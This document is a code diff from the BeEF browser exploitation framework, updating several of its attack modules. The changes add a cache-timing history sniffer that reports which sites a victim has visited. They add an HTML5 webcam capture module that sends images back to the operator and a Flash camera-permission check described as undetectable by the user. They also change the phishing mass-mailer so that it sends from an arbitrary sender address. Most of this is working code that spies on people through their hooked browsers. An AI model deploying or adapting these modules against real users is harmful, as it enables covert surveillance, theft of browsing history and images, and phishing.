         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Hook Host',     'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host
@@ -328,22 +329,22 @@ class ShellInterface
 
       case p[2]
         when "BrowserName"
-          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
 
         when "ScreenSize"
-          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = screen_size_hash['width']
           height = screen_size_hash['height']
           cdepth = screen_size_hash['colordepth']
           data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
 
         when "WindowSize"
-          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = window_size_hash['width']
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2])
+          data   = BD.get(self.targetsession, p[2])
       end
 
       # add property to summary hash

extensions/social_engineering/config.yaml

@@ -21,7 +21,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -20,14 +20,14 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo, @auth) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -67,33 +67,39 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

extensions/social_engineering/rest/socialengineering.rb

@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -106,11 +108,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

modules/browser/get_visited_domains/command.js

@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
-if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+if (beef.browser.isO() == 1){
     /****************
 	 * SCANNED URLS *
 	 ****************/
@@ -212,7 +212,7 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if(beef.browser.isO() == 1){
     setTimeout(wait_for_read, 1);
   } 
 }
@@ -242,11 +242,10 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
-   if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+   if (beef.browser.isO() == 1){
       try{
-        if(frames['f'].location.href != 'about:blank'){ 
-            throw 1;
-        }
+		
+        if(frames['f'].location.href != 'about:blank') throw 1;
         
         frames['f'].stop();
         document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if (beef.browser.isO() == 1){
       setTimeout(wait_for_noread, 1);
   }
   urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
-    if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+    if (beef.browser.isO() == 1){
        if (frames['f'].location.href == undefined){
            confirm_visited = true;
            throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isO() == 1) {
       document.getElementById('f').src = 'about:blank';
   }
   if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
   }  
 }
 
+/**************/
+/***Visipisi***/
+/**************/
+var vp_result = {};
+
+var visipisi = {
+  webkit: function(url, cb) {
+    var start;
+    var loaded = false;
+    var runtest = function() {
+      window.removeEventListener("message", runtest, false);
+      var img = new Image();
+      start = new Date().getTime();
+      try{
+      img.src = url;
+      } catch(e) {}
+      var messageCB = function (e){
+      var now = new Date().getTime();
+          if (img.complete) {
+            delete img;
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(true);
+          } else if (now - start > 10) {
+            delete img;
+	    if (window.stop !== undefined)
+		window.stop();
+            else
+		document.execCommand("Stop",false);
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(false);
+        } else {
+          window.postMessage('','*');
+      	}
+
+    };
+    window.addEventListener("message", messageCB, false);
+    window.postMessage('','*');
+  };
+  cbWrap = function (value) {cb(value);};
+  window.addEventListener("message", runtest, false);
+  window.postMessage('','*');
+  }
+};
+
+function visipisiCB(vp, endCB, sites, urls, site, result){
+    if(result === null){
+	vp_result[site] = 'Whoops';
+     }
+     else{	
+	vp_result[site] = result ? 'visited' : 'not visited';
+     }
+     var next_site = sites.pop();
+     if(next_site)
+	vp( urls[next_site], function (result) { 
+	  visipisiCB(vp, endCB, sites, urls, next_site, result);
+	});
+      else
+	endCB();
+}
+
+function getVisitedDomains(){
+    var tests = {
+	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+	twitter: 'https://twitter.com/images/spinner.gif',
+	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+	hn: 'http://ycombinator.com/images/y18.gif',
+	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+	wired: 'http://www.wired.com/images/home/wired_logo.gif',
+	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+        pandora: 'http://www.pandora.com/img/logo.png',
+        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+	staticice: 'http://staticice.com.au/images/banner.jpg',
+  };
+
+  var sites = [];
+  for (var k in tests)
+    sites.push(k);
+   sites.reverse();
+
+   vp = visipisi.webkit;
+   var first_site = sites.pop();
+   var end = function() {
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+   }
+   vp(tests[first_site], function(result) {
+	visipisiCB(vp, end, sites, tests, first_site, result);
+    });
+}
+
+function prepResult(results){
+    var result_str ='<br>';
+    for(r in results){
+      result_str += r + ':' + results[r]+'<br>';
+    }
+    return result_str;
+}
 
 beef.execute(function() { 
+  if(beef.browser.isC() == 1){
+	getVisitedDomains();
+
+  } else {  
    urls = undefined;
    exec_next = null;
    start_stuff();
+ }
 });
 
 	

modules/browser/get_visited_domains/config.yaml

@@ -10,7 +10,7 @@ beef:
             category: "Browser"
             name: "Get Visited Domains"
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["@keith55", "quentin"]
+            authors: ["@keith55", "oxplot", "quentin"]
             target:
                 working: ["FF", "IE", "O"]
                 not_working: ["C", "S"]

modules/browser/hooked_domain/deface_web_page_component/config.yaml

@@ -10,6 +10,6 @@ beef:
             category: ["Browser", "Hooked Domain"]
             name: "Replace Component (Deface)"
             description: "Overwrite a particular component of the hooked page."
-            authors: ["antisnatchor","xntrik"]
+            authors: ["antisnatchor", "xntrik"]
             target:
                 user_notify: ['ALL']

modules/browser/webcam/command.js

@@ -22,7 +22,7 @@ beef.execute(function() {
     
     
     //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
     
     //This function is called by swfobject, if if fails to add the flash file to the page
     

modules/browser/webcam_html5/command.js

@@ -0,0 +1,50 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+
+beef.execute(function() {
+    var vid_id = beef.dom.generateID();
+    var can_id = beef.dom.generateID();
+    var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
+    var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
+    $j('body').append(vid_el);
+    $j('body').append(can_el);
+
+    var ctx = can_el.getContext('2d');
+
+    var localMediaStream = null;
+
+    var cap = function() {
+        if (localMediaStream) {
+            ctx.drawImage(vid_el,0,0);
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
+        } else {
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
+        }
+    }
+
+    window.URL = window.URL || window.webkitURL;
+    navigator.getUserMedia  = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
+
+    navigator.getUserMedia({video:true},function(stream) {
+        vid_el.src = window.URL.createObjectURL(stream);
+        localMediaStream = stream;
+        setTimeout(cap,2000);
+
+    }, function(err) {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
+    });
+
+
+
+
+});
+
+
+
+
+

modules/browser/webcam_html5/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_html5:
+            enable: true
+            category: "Browser"
+            name: "Webcam HTML5"
+            description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
+            authors: ["xntrik"]
+            target:
+                 user_notify: ["C"]
+                 unknown: ["All"]

modules/browser/webcam_html5/module.rb

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'base64'
+class Webcam_html5 < BeEF::Core::Command
+  
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+    content["image"] = @datastore["image"] if not @datastore["image"].nil?
+		save content
+	end
+
+end

modules/browser/webcam_permission_check/cameraCheck.as

@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+    import flash.display.Sprite;
+    import flash.external.ExternalInterface;
+    import flash.media.Camera;
+    import flash.system.Security;
+    import flash.system.SecurityPanel;
+
+    public class CamCheck extends Sprite {
+
+        var _cam:Camera;
+
+        public function CamCheck() {
+
+            if (Camera.isSupported)     {
+                this._cam = Camera.getCamera();
+
+                if (!this._cam) {
+
+	                //Either the camera is not available or some other error has occured
+                    ExternalInterface.call("naPermissions");
+
+                } else if (this._cam.muted) {
+
+	                //The user has not allowed access to the camera
+                    ExternalInterface.call("noPermissions");
+
+                    // Uncomment this show the privacy/security settings window
+                    //Security.showSettings(SecurityPanel.PRIVACY);
+                } else {
+
+                    //The user has allowed access to the camera
+                    ExternalInterface.call("yesPermissions");
+                }
+
+            } else {
+
+                //Camera Not Supported
+                ExternalInterface.call("naPermissions");
+
+            }
+
+        }
+
+    }
+
+}

modules/browser/webcam_permission_check/command.js

@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.execute(function() {
+    
+       
+    //These 3 functions [naPermissions() The camera is not available or not supported
+    //					 yesPermissions() The user is allowing access to the camera / mic
+    //					yesPermissions() The user has not allowed access to the camera / mic
+    // Flash will invoke these functions directly.
+    //var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+
+    //This function is called by swfobject, if if fails to add the flash file to the page
+    
+    //js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+
+    //These functions are global so they can accessed by the cameraCheck.swf file
+
+    noPermissions = function() {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
+    }
+
+    yesPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D");
+    }
+
+    naPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
+    }
+
+    //After the swfobject loads the SWF file, this callback sends a status back to BeEF
+
+    var swfobjectCallback = function(e) {
+        if(e.success){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
+        } else {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
+        }
+    }
+
+
+    //This is the DIV for the flash object
+    
+    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+    $j('body').append(body_flash_container);
+
+    // Lets execute swfobject.js
+    // If it works, we then run it to embed the swf file into the above div
+    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
+        var flashvars = {};
+        var parameters = {};
+        parameters.scale = "noscale";
+        parameters.wmode = "opaque";
+        parameters.allowFullScreen = "true";
+        parameters.allowScriptAccess = "always";
+        var attributes = {};
+        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
+    });
+        
+    //A library that helps include the swf file
+    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    
+    //This is the javascript that actually calls the swfobject library to include the swf file 
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    
+
+    //Add flash content
+    //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
+    
+});
+
+
+
+
+

modules/browser/webcam_permission_check/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_permission_check:
+            enable: true
+            category: "Browser"
+            name: "Webcam Permission Check"
+            description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
+            authors: ["@bw_z"]
+            target:
+                 working: ["All"]

modules/browser/webcam_permission_check/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Webcam_permission_check < BeEF::Core::Command
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
+  end
+  
+  def post_execute 
+
+  	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+  end
+
+end

modules/debug/test_beef_debug/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var msg = "<%= @msg.gsub(/"/, '\\"') %>";
+		beef.debug(msg);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
+	}
+
+});

modules/debug/test_beef_debug/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_beef_debug:
+            enable: true
+            category: "Debug"
+            name: "Test beef.debug()"
+            description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
+                 not_working: ["IE"]

modules/debug/test_beef_debug/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+  def self.options
+    return [
+          {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end

modules/debug/test_return_image/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_return_image:
+            enable: true
+            category: "Debug"
+            name: "Return Image"
+            description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/debug/test_return_image/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_return_image < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['image'] = @datastore['image']
+    save content
+  end
+
+end

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -31,15 +31,15 @@ beef.execute(function () {
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
                 var result = strip_output(xhr.responseText);
-                console.log("result.length: " + result.length);
+                beef.debug("result.length: " + result.length);
                 if(result.length != 0){
-                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
                     beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
                         counter++;
                         setTimeout("get_additional_cmd_results()",500);
                         }
              }else{ // No more command results, ready to send another command.
-                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
             }
         };
         xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
-                console.log("get_prompt: Retrieved prompt");
+                beef.debug("get_prompt: Retrieved prompt");
                 var prompt = strip_output(xhr.responseText);
-                console.log(prompt);
+                beef.debug(prompt);
